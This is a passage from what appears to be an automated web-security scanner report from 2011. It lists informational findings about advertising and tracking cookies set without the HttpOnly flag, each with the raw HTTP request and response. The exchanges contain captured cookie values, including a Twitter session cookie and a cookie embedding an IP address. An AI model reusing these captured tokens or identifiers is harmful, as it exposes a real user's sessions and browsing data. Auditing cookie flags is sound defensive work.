8pLx9zGCMAdo35gx6qg0EhW8r75pXR8g/iCUAgT4Ks9CAoGJE3Ej/dqvUUtXxeqgQ5ujM6Ql1mCM6/Qwxxvl0q9cZVDajvuH8CXXCwpRLVa+OCcXeJpI3Bzv1cBc743BUSdU0eMjMbkXv3VEDeAbmyxTziyoDjEfObahoaldHBm2FbkZAHWmWwcKoZMW8bSfkBXNW88kI0pKCI3gt6GBKRyUXKnEUIWIKiQv8K0HbbipZoiOywSSTtfMOB5mSO2FOJScnRmCunBEV3OgweYapkOV1QTyVMZzdpn/ZgLnDJQwLNU9sW63LNFn6KcyHPv+UdBN2JSMlBacJbjngzZAoZ2z4hcit/z/YYXAdElJSigG/O066A3v7P93u5ZLmjRgSpolAYtQK+I/TWM7TOmF15H/4IsxoGttVOM7QD161vTozUBNqEJM2B/HoSS1gv0+Uet9qQR1Ylglrlv8OJQ3GLrgMmJ7YIIpI8YZ6ZcTj/ejn8Xr/oheS3pPKW3XCGoEMvfwQSYDDA8WM2Me0JlwRmNco3nJZ1V6EyQnmuW97jvbUJH+hdHrNqs3+rvk0CMNlVozZwZ47hsIo5uhYVxlxuIbQ3OWkY+ThNpYo9VGinrVdSpKv4fGKP54AiUAu80v5YTmlIUjAkak/caUN43koojV709araDbwrHbxdd11CU+4m/VIHUSzXzbrwAdHDLsbqZexSKFUyafb0JU7qWtt9UqZmQnJDr+MZMGP5x6L6liPPC2MSsBCF6KS3gl6dM1BjDkh0F7BUKvf5ijzqj/inPq5b0WogbtOM"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 15:38:32 GMT

GIF89a.............!.......,...........D..;

11.20. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"; rsi_segs_1000000=pUP148mheXIQT7uItGF25jD9QihE8IYbNKetsiW8kgFisncWnhVMqxlWq0ucAHjnyThQpuvVI9kMh8n1FZRZG3xOHqJgzQCOjhUe97Ueo/oV8rFkwdsAM2inFD5dxpd+U+E093xPsrix3+OZNio25HCvnvFhZhWthmBTyPD4RapFCIEu2lOw/IIwYkz+6mxP7SBJDiF24gicYCle3d6HY7QZbkm+odQJLW8+PWrecDnI1ZKZHQzsDKye1ebNlG+F0O7KsVRUWc2lZiRsgG+YnEnhhOgUjCqIi4i4q43MBu7CNjxFeYUhxsnubRYFgIe24n3W85w7P/Po0VHFfykAgOVvK83VaDdZKWD/KIVe8dqKzyeln73lCPFzE9HjxKDwsj/BfiMyOXhh1G8dLTLCbJhGOrlytpc84LHyZP+KVwJJNYdAUHQMimUPLIaj2XtIzdmkiZElC6E3vZ7BWA6vfqDqyz/UN2NTNZCl2XEU5yfs8jUdCq/L6cLps1Tz6jEWB3nM03mUZ7lIOmLJZpYScvQJPNi6Qhp+d6GkBErOgH5qxczpWuDAoetyw48xMGgXARtZi/Z7txvmN3uOVuc5NDiDAySPpWWPnSs=; rtc_8DRJ=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmtICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcbX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GcbX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LRCK="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaqAGPDvxKBGnNieprsaiBOVaX9FhqxzdrX8uPhBCWazG30qABONj4rZSjFRa9hNfi08iU1HDWDdK1nzgrBpcAuaMXzyefC/QKS+ifimajS+SBKYY+0NXbY+HaOBAyp4d6Vh7V4a3HNn57Xp4zGlbiay5EZLelaUYm6atBaSBGzh59PWcDdkx5qqlmsme3+3vR3BqpvIY+kwwFuy5FxcZDPvYPlu84iVYXiKx65uz7IWAWfiofvj7eJKhxVhmmfu1SQ8g/uzydoh/2BoLKQg2yfv9gAPgCERZbvCZouFKMzgcYh4BETbBfW6QqlFzNYbkCGs1ihkoHfZlil7U6FmSK1ep6qyhqsz9SaYT0Z0T6Dvkq4Yh0yx2B80AnmYh4EzGoE3D/V5h6fo2aS++o1IBLVCgJzywj3LuG95eRnmE9aYXVFNUUgDkrqLvNvMnxsv7zDf+CGB1FmQX4ZYdIaAApnF8fUIJEJuGfgpA51ZH95u2mWFbQmspipsXSH/R9ac++5WH5hm4LmLOnLfkR0eZxGZ4IjUiWgT4VBJKabhFp0VLWjZZPYJ1cg0rHJYuDC3x8gOhjAZJz7P22MxqYZICXWCAZnfDncwcbAct/UnFhJH/UMHJcrliDi77SztZn4uMMdyQsiXoHyX90/NAcsQENAESX8SG7+wzT2/+nimVdRU9E4ESP9+UsKNDtshnFXIORLPffo9I1dTN3R0N5f5abcH068cXS4lnwQuppdb3PZJ8cqt5KyeykX+lBRW1PbmT8n89cWzqo2tq2hxqSmLHzMf9dpJ0XXtAqTFptYBp87DY2YMB/ciOkzOgkgOUYLTnpK8HPlG2abZjcqhdLm561D+1AGBAR0kz/CP+gZte2800cXAnayq8cd5r/uaAL6/VSpzRC+cv5IvQOyPwfkaIzBCF7MRJwB9W/O4RBOyMpOpBE6BHuucXn+fiSRPtem82fvTtC6rYAM5Xu5K77cPlbrMgMafQdG4YlF01M9tyoK60dPDWUyqPbkPvP9rk5iG4NZXen36zhKzRzo8Z/tuyMZ"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9HMAYU1O2uQ6agQvHto2eq75IgYszgol7C7yspOc4TfCNog8fILX1SZNuyWxzrk3bzeF6RGNscLYiwwBuw5NglDbetEfHtRcFfcl95ic8yRof2oFa5L4JiQC5IaPGHVkT8GhVZ6xGeKni8NUrqKZmMAbiWsBL5UqdRbeZWToN2eg35zKeZFE02LRKzRNVXYBaa7ppkin1O9btPO6IpX68HbfkWmpxgC4rHlrQY5cih+4vFJ1yVKrNm1UsfyrQhoN1blLBVwvH7W15DdRx7AaRM+ZZsCpxf/q6821H93ulpjwedebCruCq9asXpjc3DnsSQj7rG8huZjfR5xtcyxQahF2J7aH/2RX/uwdJCqIaniRV2csxWeQDj1fYtS3LNaV5ambGum1vzYLMxBPNmdpaPS3YuuEFo4bRMtvsaWX2jD8l0O2uPJqFc1djo5/PC6TG91f37068lORbaSfLef0W9hEk+CLtpU5tIrab1g+Uhul1ETrwsFT0LsMOY7aSo1dto9gzHV1YWhgzvNPEpgmj8e/XkgtE0UFN5RbNm/yynf67Saka70ChSZUc/7F44ZxFTlNqvlId7qFlScwzwQ3zjBt1Evu1Wa6mFZSpnlDXYJaOAhPbK3QTUFPa0ulhL3Cb1rjnWB1w6IsjgXw/W04kH5Txss4xPzgXwcND/0/ZUUgAwA6zXnKWEzvICHdNGxNJB9eZzLjAp+RyLbbm8SG5i04Zm8SEF74RcB42ruBeveVRMto7o9hgrCILt3XYgejpjOHhs49ESuaKo/Mdtc4cvUatGmevM5e5UpVlcekb+gcB4zrxChd/qkCAANSUEUFYnM+n5PkikYD7SR5ekqXY1WLE1QFPGd4RdmUbRCEpKms/T90zg/75Mku6hMWLVEOHJjLsitzKuQPXZnaUKS/zn0v5ea/NbfsTjmjkmMyZ1L5L9gN2SssLQ67MHgZktcYkdXIaxkH/BQUXnj90Y0/dINaOjffbX1j8G4+JNN595YSF8C1OsLkhw7BCyyf7EmjbOGEpQCKRB5qYULcNklZ/1XQV03z4vs7NHKTNfZfWzXxMkzFwyCfZIsGydPLXTwRhsXGYrpq8ACJGAh512uOGHZSQTWSTg4xq8LTJoPrBr4l8PIsYYr6x/pF8KyJL5kcO0E2HqAKcwO1STKii+39WPDkYEafWF4om3Wl+Y4Ky3Hg6xGMXDzrBbaAgKJISziuVyk3GPOaoJUC636sgg3wb2SRVMYepf5bKCD/rosaKat34VF+1hrUCOGJ5iqDruocSVkDTqFKSWJMOJxfNyE3eQoOkxsWQLGzwVCVlHxz1GWhIH4NvpmYjAybIBqGdzob6P8ea5H4lf0I/wPKA/bxPafUtNWX6zmIJIFEP5Tt4xtEmM8clJeiqkQvX3Wb7jV9jBBipcWGFVoA6TT5EKvvRA94UPWVxCYNa6+w7M50HP2s9T2yuy62c/JPJ9GQfvJv00eejh8lPviVx4/wfwB4XMKqmZ91cTdahvWbdmf0Ezw7o034/atITXt+kj"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 1630

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.21. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d887938/3/500004862365/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d887938/3/500004862365/decide.php?ord=1304955586 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:03 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Sun, 09 May 2010 15:40:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1; expires=Fri, 29 Jun 2012 07:40:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-y]y(M-0; expires=Fri, 29-Jun-2012 07:40:03 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.22. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/wvuefox8/lists/wvue-fox-8-3/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1304955538932=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304955581-43234-51315
X-RateLimit-Limit: 150
ETag: "d640a63e6d4c8f178a68be50c58e168a"-gzip
Last-Modified: Mon, 09 May 2011 15:39:41 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04042
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e74652c3d440cadd935e7e0b1675c0679bbdd85f
X-RateLimit-Reset: 1304959140
Set-Cookie: original_referer=ZLhHHTiegr%2FMnOT%2Fp8liqKLpSbkz6bAtT4p5bnOw1ZAfyga3xOTsMg%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFzzadUvAToHaWQiJTM5Yjg2NzFhNGIzMWUw%250AZTAxOGEzYjc2YjE1OWFjZGRkIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2ae163b2825351976cb494802b1d845f55f5087e; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35250

TWTR.Widget.receiveCallback_1([{"text":"http:\/\/t.co\/PZWHmCQ","coordinates":null,"truncated":false,"id_str":"67605941750743040","source":"\u003Ca href=\"http:\/\/twitter.com\/download\/android\" rel
...[SNIP]...

11.23. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

